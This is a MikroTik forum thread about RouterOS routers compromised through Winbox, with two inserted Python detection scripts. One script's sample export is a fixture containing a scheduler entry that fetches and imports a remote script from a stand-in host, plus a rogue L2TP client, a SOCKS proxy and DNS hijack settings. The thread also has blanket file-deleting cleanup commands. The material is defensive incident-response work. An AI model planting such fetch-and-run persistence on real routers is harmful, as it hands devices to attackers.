macgaiver
Forum Guru
Posts: 1764
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: RouterOS making unaccounted outbound winbox connections

Tue Mar 27, 2018 12:54 pm

@macgaiver
Isn't your proposal going hand-in-hand with the new sex trafficking law :-) ? https://www.wired.com/story/how-a-contr ... e-the-web/
I'm on the other side of the world; here, torrents and other file sharing are still at large, so some if not most of the responsibility is taken on by the customer when he signs the agreement.
 
Filip92
just joined
Posts: 13
Joined: Fri Dec 30, 2016 6:28 pm
Location: Stalowa Wola

Re: RouterOS making unaccounted outbound winbox connections

Tue Mar 27, 2018 5:33 pm

I noticed a log entry on SXT5Lite (RouterOS v6.34.2, 6.34.4, 6.37.1):
Mar/26/2018 23:45:13   memory      info             created new share: pub
Mar/26/2018 23:45:15   memory      info             fetch: file ".i" downloaded
and then the router starts a SYN-sent flood to dst-port 23 and 8291... connection count about 900-2000...

Upgrading to 6.39.1 fixes this... Bad news: most of our clients have versions between 6.34.2 and 6.37.1 :(
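The two "memory" log lines and the flood of half-open connections to ports 23 and 8291 described in the post above are the kind of thing worth checking for across a fleet before deciding which devices to upgrade first. The script below is an added example, not code from this thread or from MikroTik: it parses RouterOS log lines in both the column layout Winbox shows and the "topics,level" layout of /log print, raises an alert when a "created new share: pub" entry is followed within a minute by a fetch download (any file name, not only ".i"), and separately counts syn-sent connections per source from rows shaped like /ip firewall connection print so that the infected LAN host can be identified the way strods suggests doing with Torch. The log lines, connection rows, addresses and the 60-second window are constructed for the example; the thresholds are assumptions to tune for your network.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample (not captured from a real device), modelled on the two
# "memory" lines Filip92 posted, with ordinary noise around them and a second
# share/fetch pair hours apart that should not fire. Lines 1-4 use the
# column layout Winbox shows; lines 5-6 use the "topics,level" form of /log print.
SAMPLE_LOG = """\
Mar/26/2018 23:44:58   system      info             user admin logged in from 10.0.0.2 via winbox
Mar/26/2018 23:45:13   memory      info             created new share: pub
Mar/26/2018 23:45:15   memory      info             fetch: file ".i" downloaded
Mar/26/2018 23:45:20   system      info             router rebooted
Mar/27/2018 01:02:03 memory,info created new share: pub
Mar/27/2018 03:10:00 memory,info fetch: file "backup.rsc" downloaded
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Za-z]{3}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\s+(?P<topics>\S+)"
    r"(?:\s+(?P<level>info|warning|error|critical|debug))?\s+(?P<msg>.*)$"
)
SHARE_MSG = "created new share: pub"
FETCH_RE = re.compile(r'^fetch: file "(?P<name>[^"]+)" downloaded$')


def parse_log(text):
    """Turn RouterOS log lines into dicts with a datetime, a topic set and the message."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        topics = set(m["topics"].split(","))
        if m["level"]:
            topics.add(m["level"])
        events.append({"time": datetime.strptime(m["ts"], "%b/%d/%Y %H:%M:%S"),
                       "topics": topics, "msg": m["msg"]})
    return events


def find_dropper_sequences(events, window=timedelta(seconds=60)):
    """Flag a 'created new share: pub' followed within `window` by a fetch
    download, which is the pair Filip92 saw just before the scanning began.
    Any fetched file name is reported, not only ".i"."""
    alerts, pending = [], None
    for ev in sorted(events, key=lambda e: e["time"]):
        if "memory" not in ev["topics"]:
            continue
        if ev["msg"] == SHARE_MSG:
            pending = ev["time"]
            continue
        m = FETCH_RE.match(ev["msg"])
        if m and pending is not None and ev["time"] - pending <= window:
            alerts.append({"time": ev["time"], "file": m["name"]})
            pending = None
    return alerts


# Constructed rows shaped like /ip firewall connection print output:
# (src-address, dst-address, dst-port, tcp-state). One LAN host has a couple
# of hundred half-open connections to 23 and 8291; another is just browsing.
SAMPLE_CONNS = (
    [("10.0.0.1", f"203.0.113.{i % 250 + 1}", 23, "syn-sent") for i in range(150)]
    + [("10.0.0.1", f"198.51.100.{i % 250 + 1}", 8291, "syn-sent") for i in range(60)]
    + [("10.0.0.2", "192.0.2.10", 443, "established")] * 5
)


def syn_sent_scan(conns, ports=(23, 8291), min_count=100):
    """Return {source: count} for sources with at least `min_count` half-open
    (syn-sent) connections to the scanned ports; those are the hosts to check
    for an old RouterOS version."""
    counts = Counter(src for src, _dst, port, state in conns
                     if state == "syn-sent" and port in ports)
    return {src: n for src, n in counts.items() if n >= min_count}


if __name__ == "__main__":
    for a in find_dropper_sequences(parse_log(SAMPLE_LOG)):
        print(f"{a['time']}: share created then fetched {a['file']!r}")
    print("scanning sources:", syn_sent_scan(SAMPLE_CONNS))
```

The second share/fetch pair in the sample is hours apart and is deliberately not reported; a fetch on its own is normal on a router that pulls its own backups, so the time window is what keeps the check from firing on every download.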
 
normis
MikroTik Support
Posts: 26379
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: RouterOS making unaccounted outbound winbox connections

Tue Mar 27, 2018 5:36 pm

Definitely try to upgrade, otherwise this thing can spread and make your problems even worse.
 
blazej44800
Frequent Visitor
Posts: 61
Joined: Thu Feb 20, 2014 6:16 pm

Re: RouterOS making unaccounted outbound winbox connections

Wed Mar 28, 2018 12:40 am

@normis
I've just discovered two devices; one is an RB SXT 5HnD with ROS 6.41.3, upgraded from an older version after infection. Both continue to scan for telnet; upgrading didn't solve the problem. Just generating a supout, awaiting it on support.
 
strods
MikroTik Support
Posts: 1624
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: RouterOS making unaccounted outbound winbox connections

Wed Mar 28, 2018 7:35 am

blazej44800 - We received such an e-mail (I assume that it was you) and the upgrade had already resolved the problem. However, local RouterOS devices running old software were also already infected. After an upgrade on those devices the problem must be resolved right away.

You can check this by running Tool/Torch on your device - here you can clearly see that the traffic comes from local IP addresses, and then check whether this source IP is a router running an old RouterOS version.

At the moment we are not aware of any single case where an upgrade would not resolve the issue.
 
macgaiver
Forum Guru
Posts: 1764
Joined: Wed May 18, 2005 5:57 pm
Location: Sol III, Sol system, Sector 001, Alpha Quadrant

Re: RouterOS making unaccounted outbound winbox connections

Thu Mar 29, 2018 5:26 pm

So far my testing shows that only mipsbe devices are getting exploited. Has anyone noticed other architectures affected?

Also, all of the devices actually required a reboot to get the exploit part going; from what I read here I had the idea that everything would happen straight away...
 
NathanA
Forum Veteran
Topic Author
Posts: 829
Joined: Tue Aug 03, 2004 9:01 am

Re: RouterOS making unaccounted outbound winbox connections

Thu Mar 29, 2018 10:49 pm

So far my testing shows that only mipsbe devices are getting exploited. Has anyone noticed other architectures affected?
I haven't, though fully-fleshed example exploits of this vulnerability were released for both mipsbe and x86 earlier this month, and Hajime supports mipsbe, x86, and arm, so it is at least *likely* that an x86 version exists but that there simply aren't enough x86 ROS boxes out there for it to spread at the same rate. If the author simply lifted the exploits from the examples that were released, then that means it's unlikely that arm, powerpc, or tile are being infected, both because it would require some additional/original work on the author's part for arm support and also because AFAIK Hajime doesn't even have binaries for powerpc or tile at this time.
Also, all of the devices actually required a reboot to get the exploit part going; from what I read here I had the idea that everything would happen straight away...
I'm not sure if it executes straight away or only does so after a reboot. As I implied in a prior post, I have been able, as a test, to copy the Hajime loader onto a clean device and run it manually, and it will start up and run; however it will not install the rc.d (startup) script itself, so whatever host is pushing the Hajime loader onto the device is also pushing the rc.d script onto it. If you only put the actual Hajime binary onto a device and run it, it will not automatically start up after reboot.

It's possible that the host pushing the infection is 1) copying Hajime binary to device, 2) copying Hajime rc.d script to device, and then 3) issuing reboot command to device, starting it that way. There is no reason why it would have to issue reboot, though, instead of just start up the Hajime process straight away.

-- Nathan
 
k6ccc
Forum Guru
Posts: 1497
Joined: Fri May 13, 2016 12:01 am
Location: Glendora, CA, USA (near Los Angeles)

Re: RouterOS making unaccounted outbound winbox connections

Sat Mar 31, 2018 1:42 am

I use a non-standard port for all the ways into the router (including WinBox), in addition to other things for security. I have firewall rules that drop traffic bound for the standard ports for www, ftp, ssh and WinBox. The real purpose of those rules is to give me packet counts, since the traffic would be dropped later anyway. Sure enough, I have been getting quite a few hits on the "normal" WinBox port 8291...
Made sure all three routers were up to date too (they were all pretty close)...
 
rllavona13
just joined
Posts: 7
Joined: Mon Nov 28, 2016 12:41 am

Re: RouterOS making unaccounted outbound winbox connections

Fri Jun 22, 2018 10:29 pm

We have the same problem. I noticed the problem is in versions before 6.37; I was able to resolve it by upgrading RouterOS to 6.42.1 and upgrading the firmware. No need to fresh install anything, just upgrade to the latest version and the problem is fixed. There's a worm infecting RouterOS and I guess MikroTik doesn't know or just ignores the problem.
 
pe1chl
Forum Guru
Posts: 10231
Joined: Mon Jun 08, 2015 12:09 pm

Re: RouterOS making unaccounted outbound winbox connections

Fri Jun 22, 2018 10:51 pm

There's a worm infecting RouterOS and I guess MikroTik doesn't know or just ignores the problem.
It is actually YOU who didn't know you had to update...
If you had been on the mailing list or forum, you would have known about this for months.
It is better to keep your devices up to date so you are less likely to be affected by problems like this.
And of course configure your firewall correctly so the admin interface is not available from the internet.
 
anav
Forum Guru
Posts: 19352
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: RouterOS making unaccounted outbound winbox connections

Sat Aug 11, 2018 3:27 pm

We have the same problem. I noticed the problem is in versions before 6.37; I was able to resolve it by upgrading RouterOS to 6.42.1 and upgrading the firmware. No need to fresh install anything, just upgrade to the latest version and the problem is fixed. There's a worm infecting RouterOS and I guess MikroTik doesn't know or just ignores the problem.
What?
First of all, depending upon the state and depth of the compromise, a wipe and fresh install may be required. In other words, one cannot generalize your fix as a panacea for everyone else's issues.
The vulnerabilities of the MikroTik router in past OS versions and via Winbox have been well documented and patched by MikroTik, so I would say you are ill informed regarding their work. Logically speaking, why would they ignore the problem? It makes no sense from a technical, security or business perspective. As a purported engineer in your signature, do you really think the engineers at MikroTik would have such an approach?? From my reading, most of the issues were NOT actually POSSIBLE unless the person administering the router was incompetent (at least from a security point of view).
 
carl0s
Member Candidate
Posts: 180
Joined: Thu Jun 25, 2009 7:18 pm

Re: RouterOS making unaccounted outbound winbox connections

Wed Sep 19, 2018 12:11 am

Just check in System -> Scheduler.
There will be a schedule that runs a script every minute which continues to let the hackers in.
Remove the script from System -> Scripts too.
SOCKS proxy has probably been enabled; turn that off.
Check there are no new users added under System -> Users.
Change the password of the existing user.
Kill the existing connections in the IP -> Firewall -> Connections table.
Also check for NAT rules.

Obviously, if possible, restrict Winbox access too.

Oh, and yeah, upgrade RouterOS to a version that doesn't allow the whole internet to pull down the username & password table :D
 
davzar
just joined
Posts: 8
Joined: Tue Aug 09, 2016 11:20 am

Re: RouterOS making unaccounted outbound winbox connections

Wed Sep 19, 2018 12:37 pm

Another important check is:

check if you have static entries in IP/DNS/Static.

I found a DNS A record and CNAME to a fake MikroTik download site,

maybe to download an altered version of RouterOS.
 
carl0s
Member Candidate
Posts: 180
Joined: Thu Jun 25, 2009 7:18 pm

Re: RouterOS making unaccounted outbound winbox connections

Thu Sep 20, 2018 2:16 am

Another important check is:

check if you have static entries in IP/DNS/Static.

I found a DNS A record and CNAME to a fake MikroTik download site,

maybe to download an altered version of RouterOS.
That's a really interesting one. I hadn't thought to check that!
 
anav
Forum Guru
Posts: 19352
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: RouterOS making unaccounted outbound winbox connections

Sun Mar 03, 2019 11:52 pm

Just check in System -> Scheduler.
There will be a schedule that runs a script every minute which continues to let the hackers in.
Remove the script from System -> Scripts too.
SOCKS proxy has probably been enabled; turn that off.
Check there are no new users added under System -> Users.
Change the password of the existing user.
Kill the existing connections in the IP -> Firewall -> Connections table.
Also check for NAT rules.

Obviously, if possible, restrict Winbox access too.

Oh, and yeah, upgrade RouterOS to a version that doesn't allow the whole internet to pull down the username & password table :D
Wrong, wrong, wrong. You cannot remove this sheite by simple means.
Stop, don't check anything, don't waste your time...........
The only approved method once infected/hacked is to use netinstall with a fresh install of the latest firmware and start from scratch.
 
Harry53
just joined
Posts: 8
Joined: Sat Feb 29, 2020 6:41 pm

Re: RouterOS making unaccounted outbound winbox connections

Sun Mar 01, 2020 7:43 pm

I suggest you use netinstall for a new start. Then update your version.
 
sjoram
Member Candidate
Posts: 187
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: RouterOS making unaccounted outbound winbox connections

Sun Feb 21, 2021 12:47 pm

Wrong, wrong, wrong. You cannot remove this sheite by simple means.
Stop, don't check anything, don't waste your time...........
The only approved method once infected/hacked is to use netinstall with a fresh install of the latest firmware and start from scratch.
Agree with this. I had the same issue some time back because my external Winbox access (for trusted networks) had been incorrectly configured and Winbox was in fact exposed to the entire internet. Ouch.

You can strip everything from the config, but it will be back after a reboot. Trust me, I tried that as a short-term fix until I was able to do more. I went one step further and bought a new RouterBOARD (took the opportunity to upgrade from RB750 to RB750Gr3/hEX). I've since run netinstall on the affected box to the latest software version to use it as an internal testing box; no sign of the previous issues after netinstall.

I'm also now using an RSS-to-email application to keep up to date with the changelogs.
 
lis
just joined
Posts: 5
Joined: Sun Apr 04, 2021 2:36 pm

Re: RouterOS making unaccounted outbound winbox connections

Fri Jul 23, 2021 1:48 pm

To supplement, as I had a similar issue.

Best is to run netinstall as stated, but do not restore the config. My problem with this was that there was a script set up in the scheduler that I had not noticed, and it was in the config. Restoring the MikroTik from netinstall didn't help as I restored the problem from the backup :) In my case there was a script that every 2 hours was pulling something from the internet and making config; then it kept adding proxy IP addresses that the threat actors wanted to use for their botnet. Fortunately I avoided damage due to a well-configured firewall, but I had to re-do a lot of stuff.
 
pe1chl
Forum Guru
Posts: 10231
Joined: Mon Jun 08, 2015 12:09 pm

Re: RouterOS making unaccounted outbound winbox connections

Fri Jul 23, 2021 2:04 pm

To supplement, as I had a similar issue.

Best is to run netinstall as stated, but do not restore the config.
Actually, nobody above told you to restore the config! They all mention "start from scratch" after netinstall. Restoring the config is not safe, and when you did that you need to repeat the netinstall.
The only thing you can do to restore some settings is to reset the router to empty config and then use a /export file opened in a separate window to copy/paste settings that you KNOW are safe.
(so in that phase you skip the scripts and other settings that you did not make yourself. best is to use the copy/paste only for items that are difficult to exactly replicate via manual setup)
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: RouterOS making unaccounted outbound winbox connections

Fri Jul 23, 2021 4:30 pm

Better if you make an export and share it here.

Do:
/export file=export
then open it with Notepad,
then censor your identifiable data with *** (do not remove anything, just censor),
and share the export.rsc.
 
maniraj4143
just joined
Posts: 11
Joined: Wed Jan 22, 2014 4:47 am
Location: INDIA

Re: RouterOS making unaccounted outbound winbox connections

Tue Aug 31, 2021 3:44 pm

Same issue here; kindly check both the current export and the hacked .rsc files.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: RouterOS making unaccounted outbound winbox connections

Tue Aug 31, 2021 3:52 pm

Your fault: you keep using 6.40, some years old (2018-02-26), without any trace of a firewall and with Winbox on the standard port 8291 open to the whole world...
Use netinstall to remove all the mess...

In the meantime paste this on the terminal:
/interface l2tp-client
remove [find]
/ip socks
set enabled=no port=666
/system scheduler
remove [find]
 
maniraj4143
just joined
Posts: 11
Joined: Wed Jan 22, 2014 4:47 am
Location: INDIA

Re: RouterOS making unaccounted outbound winbox connections

Tue Aug 31, 2021 4:41 pm

Thanks for the info. Could you please also post the command to remove the 7wmp0b4s.rsc file from the file list.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: RouterOS making unaccounted outbound winbox connections

Tue Aug 31, 2021 4:41 pm

You seriously ask this?
Click on the red "-"???

Or on terminal
/file remove [find]

Remember to netinstall and CHANGE PASSWORD NOW

On System / User check if other users are present.
 
maniraj4143
just joined
Posts: 11
Joined: Wed Jan 22, 2014 4:47 am
Location: INDIA

Re: RouterOS making unaccounted outbound winbox connections

Wed Sep 01, 2021 12:19 pm

Just upgraded a client CPE to ROS 6.48.1; the issue still persists. I seriously need to perform netinstall on all client devices, and these are 200 units. Any suggestions to save time?
Ran this script on all devices:

/file remove [find]
/
/ip socks set enabled=no
/
/system scheduler remove [find]
/
/interface l2tp-client remove [find]
/
/tool mac-server set allowed-interface-list=none
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: RouterOS making unaccounted outbound winbox connections

Wed Sep 01, 2021 12:37 pm

Sorry if I'm rude,
but the time you didn't invest in safety,
you now spend a thousand times over to repair the damage.

CHECK ON USERS WHETHER MORE THAN ONE "ADMIN" USER EXISTS
CHANGE PASSWORDS (and do not use the same password again for all the devices)

/interface l2tp-client remove [find]
/ip socks set enabled=no port=1080
/system script remove [find]
/system scheduler remove [find]
/file remove [find where name!="flash"]
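The checklist carl0s posted (scheduler entries, scripts, SOCKS, extra users, NAT), davzar's static DNS records, pe1chl's advice to copy only settings you KNOW are safe out of an /export, and the terminal commands rextended posted all come down to reading an export file for the same handful of indicators. The script below is an added example, not code from this thread or from MikroTik: it parses a RouterOS .rsc export offline into sections and key=value entries, reports each indicator together with a cleanup command that targets only the named item (rather than the blanket `remove [find]` above, which also wipes your own scheduler entries and scripts), and records the RouterOS version from the export header. The sample export, the names U6 and l2tp-out1, the addresses and the "known users" list are all constructed for the example; the line-wrapping logic assumes the usual export convention of a trailing backslash and an indented continuation line. The thread's conclusion stands: this is for triage and for deciding what is safe to paste back after a netinstall, not a substitute for it.

```python
import re
import shlex

# Constructed sample export (not a real compromised router), modelled on the
# items named in this thread: a scheduler entry that re-fetches a script every
# minute, the script itself, SOCKS enabled, an L2TP client, an extra user, a
# static DNS record pointing a MikroTik download host at a stranger's address
# and a dst-nat rule. Addresses come from documentation ranges.
SAMPLE_EXPORT = r'''
# aug/31/2021 15:30:00 by RouterOS 6.40
# software id = ABCD-1234
#
/interface l2tp-client
add connect-to=203.0.113.10 disabled=no name=l2tp-out1 password=bot user=bot
/ip dns static
add address=203.0.113.10 name=download.mikrotik.com
add address=192.168.88.1 name=router.lan
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=dst-nat chain=dstnat dst-port=8291 protocol=tcp \
    to-addresses=203.0.113.10
/ip socks
set enabled=yes port=4153
/system scheduler
add interval=1m name=U6 on-event="/tool fetch url=\"http://203.0.113.10/x.rsc\"; /import x.rsc" policy=read,write,policy,test
/system script
add name=U6 policy=read,write source="/ip socks set enabled=yes"
/user
add group=full name=service password=hunter2
'''


def _logical_lines(text):
    """Re-join lines the export wrapped with a trailing backslash (assumes the
    RouterOS convention: backslash at end of line, continuation indented)."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip() if buf else raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield (buf + line).strip()
        buf = ""


def parse_export(text):
    """Return {section: [entry, ...]}; an entry holds the key=value pairs of
    one add/set line plus '_verb' (the command word)."""
    sections, current = {}, None
    for line in _logical_lines(text):
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):                # section header, e.g. /system scheduler
            current = line
            sections.setdefault(current, [])
            continue
        tokens = shlex.split(line)              # copes with "..." values and \" inside them
        if current is None or not tokens:
            continue
        entry = {"_verb": tokens[0]}
        for tok in tokens[1:]:
            key, sep, val = tok.partition("=")
            entry[key] = val if sep else ""     # bare word, e.g. "winbox" in "set winbox ..."
        sections[current].append(entry)
    return sections


def export_version(text):
    """RouterOS version recorded in the export header, or None."""
    m = re.search(r"by RouterOS (\d+(?:\.\d+)+)", text)
    return m.group(1) if m else None


def audit_export(text, known_users=("admin",)):
    """Return (section, description, cleanup command) per indicator. The
    cleanup commands target the named item only; netinstall is still the end state."""
    cfg = parse_export(text)
    findings = []

    def added(section):
        return [e for e in cfg.get(section, []) if e["_verb"] == "add"]

    def flag(section, e, what, fix=None):
        findings.append((section, what, fix or f'{section} remove [find name="{e.get("name")}"]'))

    for e in added("/system scheduler"):
        flag("/system scheduler", e, f'"{e.get("name")}" every {e.get("interval")}: {e.get("on-event")}')
    for e in added("/system script"):
        flag("/system script", e, f'"{e.get("name")}": {e.get("source")}')
    for e in cfg.get("/ip socks", []):
        if e.get("enabled") == "yes":
            flag("/ip socks", e, f'SOCKS proxy enabled on port {e.get("port")}', "/ip socks set enabled=no")
    for e in added("/interface l2tp-client"):
        flag("/interface l2tp-client", e, f'"{e.get("name")}" connects to {e.get("connect-to")}')
    for e in added("/user"):
        if e.get("name") not in known_users:
            flag("/user", e, f'unexpected user "{e.get("name")}" in group {e.get("group")}')
    for e in added("/ip dns static"):
        if "mikrotik" in e.get("name", "").lower():
            flag("/ip dns static", e, f'{e.get("name")} -> {e.get("address")} (possible fake download host)')
    for e in added("/ip firewall nat"):
        if e.get("action") in ("dst-nat", "netmap"):
            flag("/ip firewall nat", e, f'{e.get("action")} to {e.get("to-addresses")}: verify it is yours',
                 "/ip firewall nat print detail")
    return findings


if __name__ == "__main__":
    print("export from RouterOS", export_version(SAMPLE_EXPORT))
    for section, what, fix in audit_export(SAMPLE_EXPORT):
        print(f"{section:24} {what}\n{'':24} -> {fix}")
```

Run it against the censored export rextended asked for and hand the findings, not the raw file, to whoever is doing the cleanup; everything in the export that is not flagged is still only "not one of the indicators this thread names", which is why the copy/paste-after-netinstall approach pe1chl describes applies to the remaining lines too.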
